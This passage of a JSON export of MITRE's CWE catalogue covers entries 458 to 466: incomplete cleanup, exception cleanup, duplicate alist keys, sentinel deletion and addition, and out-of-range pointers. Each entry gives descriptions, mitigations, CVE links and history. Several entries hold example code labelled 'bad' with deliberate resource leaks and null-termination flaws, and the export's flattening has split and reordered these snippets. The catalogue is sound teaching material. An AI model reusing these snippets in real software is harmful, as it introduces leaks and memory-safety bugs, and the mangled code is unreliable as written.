Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}],"Previous_Entry_Name":{"#text":"Uninitialized Variable","attr":{"@_Date":"2008-04-11"}}}},"458":{"attr":{"@_ID":"458","@_Name":"DEPRECATED: Incorrect Initialization","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness has been deprecated because its name and description did not match. The description duplicated CWE-454, while the name suggested a more abstract initialization problem. Please refer to CWE-665 for the more abstract problem.","Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Incorrect Initialization","attr":{"@_Date":"2008-04-11"}}}},"459":{"attr":{"@_ID":"459","@_Name":"Incomplete Cleanup","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly \\"clean up\\" and remove temporary or supporting resources after they have been used.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Insufficient Cleanup"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Other","Confidentiality","Integrity"],"Impact":["Other","Read Application Data","Modify Application Data","DoS: Resource Consumption (Other)"],"Note":"It is possible to overflow the number of temporary files because directories typically have limits on the number of files allowed. This could create a denial of service problem."}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Temporary files and other supporting resources should be deleted/released immediately after they are no longer needed."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Stream resources in a Java application should be released in a finally block, otherwise an exception thrown before the call to close() would result in an unreleased I/O resource. In the example below, the close() method is called in the try block (incorrect).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {} catch (Throwable t) {}","xhtml:div":[{"#text":"InputStream is = new FileInputStream(path);byte b[] = new byte[is.available()];is.read(b);is.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},{"#text":"log.error(\\"Something bad happened: \\" + t.getMessage());","attr":{"@_style":"margin-left:10px;"}}]}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0552","Description":"World-readable temporary file not deleted after use.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0552"},{"Reference":"CVE-2005-2293","Description":"Temporary file not deleted after use, leaking database usernames and passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2293"},{"Reference":"CVE-2002-0788","Description":"Interaction error creates a temporary file that can not be deleted due to strong permissions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0788"},{"Reference":"CVE-2002-2066","Description":"Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2066"},{"Reference":"CVE-2002-2067","Description":"Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2067"},{"Reference":"CVE-2002-2068","Description":"Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2068"},{"Reference":"CVE-2002-2069","Description":"Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2069"},{"Reference":"CVE-2002-2070","Description":"Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2070"},{"Reference":"CVE-2005-1744","Description":"Users not logged out when application is restarted after security-relevant changes were made.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1744"}]},"Functional_Areas":{"Functional_Area":"File Processing"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Incomplete Cleanup"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO42-C","Entry_Name":"Close files when they are no longer needed","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM31-C","Entry_Name":"Free dynamically allocated memory when no longer needed","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO04-J","Entry_Name":"Release resources when they are no longer needed"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO00-J","Entry_Name":"Do not operate on files in shared directories"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP14","Entry_Name":"Failure to release resource"}]},"Notes":{"Note":[{"#text":"CWE-459 is a child of CWE-404 because, while CWE-404 covers any type of improper shutdown or release of a resource, CWE-459 deals specifically with a multi-step shutdown process in which a crucial step for \\"proper\\" cleanup is omitted or impossible. That is, CWE-459 deals specifically with a cleanup or shutdown process that does not successfully remove all potentially sensitive data.","attr":{"@_Type":"Relationship"}},{"#text":"Overlaps other categories such as permissions and containment. Concept needs further development. This could be primary (e.g. leading to infoleak) or resultant (e.g. resulting from unhandled error conditions or early termination).","attr":{"@_Type":"Relationship"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Common_Consequences, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"460":{"attr":{"@_ID":"460","@_Name":"Improper Cleanup on Thrown Exception","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not clean up its state or incorrectly cleans up its state when an exception is thrown, leading to unexpected state or control flow.","Extended_Description":"Often, when functions or loops become complicated, some level of resource cleanup is needed throughout execution. Exceptions can disturb the flow of the code and prevent the necessary cleanup from happening.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"459","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context","Note":"The code could be left in a bad state."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"If one breaks from a loop or function by throwing an exception, make sure that cleanup happens or that you should exit the program. Use throwing exceptions sparsely."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class foo {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public static final void main( String args[] ) {}public static final boolean doStuff( ) {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"boolean returnValue;returnValue=doStuff();","xhtml:br":["",""]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"boolean threadLock;boolean truthvalue=true;try {}catch (Exception e){}return truthvalue;","xhtml:br":["","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"while() {}","xhtml:br":["","",""],"xhtml:i":"//check some condition","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"threadLock=true; //do some stuff to truthvaluethreadLock=false;","xhtml:br":["",""]}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"System.err.println(\\"You did something bad\\");if (something) return truthvalue;","xhtml:br":["",""]}}]}}],"xhtml:br":""}}}},"Body_Text":"In this case, you may leave a thread locked accidentally."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Improper cleanup on thrown exception"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR03-J","Entry_Name":"Restore prior object state on method failure"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR05-J","Entry_Name":"Do not let checked exceptions escape from a finally block"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP31-PL","Entry_Name":"Do not suppress or ignore exceptions","Mapping_Fit":"Imprecise"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}]}},"462":{"attr":{"@_ID":"462","@_Name":"Duplicate Key in Associative List (Alist)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Duplicate keys in associative lists can lead to non-unique keys being mistaken for an error.","Extended_Description":"A duplicate key entry -- if the alist is designed properly -- could be used as a constant time replace function. However, duplicate key entries could be inserted by mistake. Because of this ambiguity, duplicate key entries in an association list are not recommended and should not be allowed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"694","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use a hash table instead of an alist."},{"Phase":"Architecture and Design","Description":"Use an alist which checks the uniqueness of hash keys with each entry before inserting the entry."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code adds data to a list and then attempts to sort the data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"alist = []while (foo()): #now assume there is a string data with a key basename","xhtml:br":"","xhtml:div":{"#text":"queue.append(basename,data)queue.sort()","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"Since basename is not necessarily unique, this may not sort how one would like it to be."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Duplicate key in associative list (alist)"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV02-C","Entry_Name":"Beware of multiple environment variables with the same effective name"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Demonstrative_Examples, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"463":{"attr":{"@_ID":"463","@_Name":"Deletion of Data Structure Sentinel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The accidental deletion of a data-structure sentinel can cause serious programming logic problems.","Extended_Description":"Often times data-structure sentinels are used to mark structure of the data structure. A common example of this is the null character at the end of strings. Another common example is linked lists which may contain a sentinel to mark the end of the list. It is dangerous to allow this type of control data to be easily accessible. Therefore, it is important to protect from the deletion or modification outside of some wrapper interface which provides safety.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"464","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Availability","Other"],"Impact":"Other","Note":"Generally this error will cause the data structure to not work properly."},{"Scope":["Authorization","Other"],"Impact":"Other","Note":"If a control character, such as NULL is removed, one may cause resource access control problems."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use an abstraction library to abstract away risky APIs. Not a complete solution."},{"attr":{"@_Mitigation_ID":"MIT-10"},"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.","For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"Phase":"Operation","Description":"Use OS-level preventative functionality. Not a complete solution."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example creates a null terminated string and prints it contents.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *foo;int counter;foo=calloc(sizeof(char)*10);for (counter=0;counter!=10;counter++) {printf(\\"%s\\\\n\\",foo);}","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"foo[counter]=\'a\';","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The string foo has space for 9 characters and a null terminator, but 10 characters are written to it. As a result, the string foo is not null terminated and calling printf() on it will have unpredictable and possibly dangerous results."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Deletion of data-structure sentinel"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;NUL-Termination Problems&#34;, Page 452"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Deletion of Data-structure Sentinel","attr":{"@_Date":"2008-04-11"}}}},"464":{"attr":{"@_ID":"464","@_Name":"Addition of Data Structure Sentinel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The accidental addition of a data-structure sentinel can cause serious programming logic problems.","Extended_Description":"Data-structure sentinels are often used to mark the structure of data. A common example of this is the null character at the end of strings or a special sentinel to mark the end of a linked list. It is dangerous to allow this type of control data to be easily accessible. Therefore, it is important to protect from the addition or modification of sentinels.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data","Note":"Generally this error will cause the data structure to not work properly by truncating the data."}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Implementation","Architecture and Design"],"Description":"Encapsulate the user from interacting with data sentinels. Validate user input to verify that sentinels are not present."},{"Phase":"Implementation","Description":"Proper error checking can reduce the risk of inadvertently introducing sentinel values into data. For example, if a parsing function fails or encounters an error, it might return a value that is the same as the sentinel."},{"Phase":"Architecture and Design","Description":"Use an abstraction library to abstract away risky APIs. This is not a complete solution."},{"Phase":"Operation","Description":"Use OS-level preventative functionality. This is not a complete solution."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example assigns some character values to a list of characters and prints them each individually, and then as a string. The third character value is intended to be an integer taken from user input and converted to an int.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *foo;foo=malloc(sizeof(char)*5);foo[0]=\'a\';foo[1]=\'a\';foo[2]=atoi(getc(stdin));foo[3]=\'c\';foo[4]=\'\\\\0\'printf(\\"%c %c %c %c %c \\\\n\\",foo[0],foo[1],foo[2],foo[3],foo[4]);printf(\\"%s\\\\n\\",foo);","xhtml:br":["","","","","","","",""]}},"Body_Text":"The first print statement will print each character separated by a space. However, if a non-integer is read from stdin by getc, then atoi will not make a conversion and return 0. When foo is printed as a string, the 0 at character foo[2] will act as a NULL terminator and foo[3] will never be printed."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Addition of data-structure sentinel"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR03-C","Entry_Name":"Do not inadvertently truncate a null-terminated byte string"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR06-C","Entry_Name":"Do not assume that strtok() leaves the parse string unchanged"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Likelihood_of_Exploit, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Addition of Data-structure Sentinel","attr":{"@_Date":"2008-04-11"}}}},"466":{"attr":{"@_ID":"466","@_Name":"Return of Pointer Value Outside of Expected Range","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A function can return a pointer to memory that is outside of the buffer that the pointer is expected to reference.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Memory","Modify Memory"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Illegal Pointer Value"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}}]},"Notes":{"Note":{"#text":"This entry should have a chaining relationship with CWE-119 instead of a parent / child relationship, however the focus of this weakness does not map cleanly to any existing entries in CWE. A new parent is being considered which covers the more generic problem of incorrect return values. There is also an abstract relationship to weaknesses in which one component sends incorrect messages to another component; in this case, one routine is sending an incorrect value to another.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content 